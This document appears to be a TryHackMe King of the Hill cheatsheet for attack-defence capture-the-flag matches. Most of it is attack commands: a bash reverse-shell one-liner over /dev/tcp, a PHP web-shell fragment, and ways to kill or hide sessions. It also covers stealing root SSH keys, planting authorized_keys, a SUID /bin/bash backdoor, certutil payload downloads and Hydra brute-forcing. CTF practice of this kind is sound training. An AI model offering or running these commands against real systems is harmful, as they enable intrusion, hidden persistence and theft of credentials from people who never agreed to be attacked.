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Koth πŸ‘¨πŸ»β€πŸ’»Hacker Vs HackerπŸ‘¨πŸ»β€πŸ’» Techniques

TryHackMe KOTH Cheatsheet


Description: In the King of the Hill (KoTH) Attack-Defence challenge, your goal is to compromise the target machine and gain access to the coveted /root/king.txt file on Linux machines or C:\king.txt (or C:\Users\Administrator\king-server\king.txt) on Windows machines. Once you've successfully breached the system, your task is to maintain access and defend the king file from other players.


--> [ Hacker Vs Hacker ] <--

  • you can check who is on the machine, by using the following command.
ps aux | grep pts
  • If you're looking for your pts id/number:
  • killing session of other players:
pkill -9 -t pts/$0   # Here $0 = pts/id number
  • If your opponent killing your session, again and again. you can use this command to hide your shell (pts id) on the machine

  • To get the PID of your PTS.

ps aux 
  • Hide your PTS
mount -o bind /tmp /proc/your-PID-here

if you use this command then your opponent will not be able to kill your session Anymore ;)

--> [ Useful Websites to get Reverse shell & Privilege escalation ] <--

  • Use this website to generate Reverse shell command (bash,python,PHP,socat)☠️ 
  • Reverse Shell generator + other Useful commands for basic penetration testingπŸ› οΈ
  • Easy to Remember Reverse shell 🐚 oneliner
bash -c "bash -i >& /dev/tcp/ 0>&1"
  • Use this github repo to get code of php-reverse-shell.php πŸ’ 
  • GTFoBins is a curated list of Unix binaries that can be used to escalate Privilege: 

--> [ Finding Binaries and flags ] <--


  • If you're looking for Binaries that has root permissions:
1) find / -perm -u=s -type f 2>/dev/null
2) find / -type f \( -perm -4000 -o -perm -2000 \) -print 
3) find / -perm /4000 2>/dev/null
4) find / -type f -user root -perm -u=s 2>/dev/null
  • If you're looking for Binaries that has Sudo permissions:
sudo -l 
  • If you're looking for Flags:
1) find / -type f -name "user.txt" 2>/dev/null
2) find / -name root.txt 2>/dev/null 
3) find / -name .flag 2>/dev/null

--> [ Changing User Password ] <--

  • Change the password for the root user and other existing users using one-liners:
1) echo -e "YOURpassword\nYOURpassword" | passwd root
2) echo -e "YOURpassword\nYOURpassword" | passwd user 

--> [ Protect Your Name in King.txt ] <--

  • protect king.txt using chattr.


chattr +i king.txt 


chattr -i king.txt 

  • Use chattr loops to protect lock your name in king.txt
while [ 1 ]; do chattr -ia /root/king.txt 2>/dev/null; echo -n "YourNick" >| /root/king.txt 2>/dev/null; chattr +ia /root/king.txt 2>/dev/null; done &  

  • Use Chattr for lock /root folder:
cd / && chattr +i root

--> [ Remove && Install Chattr binarie in target machine ] <--

It is forbidden to change the permission of binaries in Koth Match, for example give a chmod 700 /usr/bin/find, except chattr, the chattr binary is allowed to remove from the machine.( remove from the machine after you use: [Activate] chattr +i king.txt ).

  • Remove chattr so no one will be able to change the attributes of king.txt


rm /usr/bin/chattr
  • but if you have access to a koth box and you don't have chattr you can get a chattr binary from github and compile it on the machine:
gcc chattr.c -o chattr 
./chattr +i king.txt 

--> [ Unmount other player name from king.txt] <--

if you try to put your nick in /root/king.txt and the message "Read-only file system" appears, that means the other player is used Mount technique.

  • Unmount king.txt using umount:
umount -l /root
umount -l /root/king.txt 

PHP Web CMD Shell

Get Shell by exploiting file upload Vulnerability


        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        echo "</pre>";

---> Shell Persistence using SSH <---


Shell Persistence using SSH - Attacker Terminal & Target Terminal

Step 1: Navigate to the SSH directory on your Target Terminal -

cd /root/.ssh

Step 1.2 :- Return to your attacker Terminal and execute:

cd /root/.ssh

Step 2: Return to your attacker terminal and execute:

ssh-keygen -t rsa

[Attacker Terminal] Step 3: Display the content of using cat and copy its content using:

cat """ <Content> """ > authorized_keys

Example: Screenshot_2024-01-04_19-28-42

[Attacker Terminal] Step 4: Set the permissions for id_rsa -

chmod 600 id_rsa

Attacker Terminal Step 4.1: Send authorized_keys to the target system.:)

[Target Terminal] Step 5: Set permissions for authorized_keys -

chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

[Attacker Terminal] Step 6: Connect to the target system using the generated key -

ssh -i id_rsa root@

Shell Persistence using High privileged user/root SSH RSA-key πŸ”‘

To avoid the need to re-exploit the host, we stored a copy of the root users id_rsa ssh key on our local machine as key.rsa


Display the content of id_rsa using cat command and copy its content in key.rsa:

cat id_rsa >> key.rsa 

To reconnect with the key we executed

ssh -i key.rsa root@

Windows MS17-010 exploit β—†

Transport post privilege escalation payloads

Python3 Server (Attacker Machine)

python3 -m http.server 8080

Get install stuff in linux target


Get install stuff in Windows target

certutil.exe -urlcache -f

Root Shell Persistence Backdoor via Bash

Run this command on your root shell to give permissions:

sudo chmod +s /bin/bash

Now, whenever you access this system again, run this command:

/bin/bash -p

Brute-Force Attack

Use Hydra to Brute-Force Login page

 hydra -l admin -P passlist.txt http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

Use Hydra to Brute-Force SSH service

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh

Meterpreter as Persistence Backdoor πŸ’€βƒ€